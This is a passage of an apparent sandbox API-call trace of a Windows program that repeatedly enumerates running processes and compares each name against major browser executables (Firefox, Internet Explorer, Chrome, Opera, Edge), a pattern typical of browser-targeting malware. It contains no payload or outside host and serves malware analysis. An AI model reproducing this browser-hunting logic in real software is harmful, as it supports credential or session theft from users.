th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.186] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.186] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.186] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.186] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0221.186] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0221.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0221.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0221.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0221.187] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.187] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.187] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0221.188] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0221.188] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0221.188] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0221.188] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.188] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.188] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.188] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.188] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0221.188] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0221.189] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.190] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.190] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.190] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.190] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0221.190] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0221.190] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0221.190] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0221.190] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0221.191] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0221.191] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0221.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0221.191] CloseHandle (hObject=0xe8) returned 1 [0221.191] Sleep (dwMilliseconds=0x3e8) [0222.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0222.202] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.202] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0222.202] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0222.202] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0222.202] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0222.202] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0222.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.203] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0222.203] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0222.203] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0222.203] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0222.203] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0222.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.203] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0222.203] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0222.203] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0222.203] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0222.203] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.204] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0222.204] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0222.204] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0222.204] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0222.204] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.205] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0222.205] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0222.205] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0222.205] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0222.205] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.205] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0222.205] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0222.205] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0222.205] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0222.205] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.206] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0222.206] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0222.206] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0222.206] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0222.206] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.206] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0222.206] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0222.206] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0222.207] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0222.207] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.207] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0222.207] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0222.207] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0222.207] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0222.207] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.208] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0222.208] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0222.208] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0222.208] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0222.208] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.208] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.208] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.208] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.208] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.208] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.209] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.209] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.210] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.210] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.210] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.210] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.210] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.210] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.211] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.211] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.211] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.211] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.211] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.211] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0222.211] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0222.211] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0222.211] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0222.211] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.212] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.212] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.212] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.212] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.212] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.212] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.212] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.212] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.213] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.213] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.213] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.213] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0222.213] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0222.213] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0222.213] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0222.213] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.214] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0222.214] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0222.214] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0222.214] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0222.214] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0222.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0222.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0222.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0222.214] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.215] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.215] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.215] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.215] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.215] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0222.216] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0222.216] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0222.216] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0222.216] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0222.216] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0222.216] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0222.216] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0222.216] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0222.216] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0222.216] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0222.217] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0222.217] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0222.217] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0222.217] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0222.217] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.217] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0222.217] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0222.218] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0222.218] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0222.218] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0222.218] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0222.218] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0222.218] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0222.218] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0222.218] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0222.218] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0222.219] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0222.219] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0222.219] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0222.219] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0222.219] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0222.219] 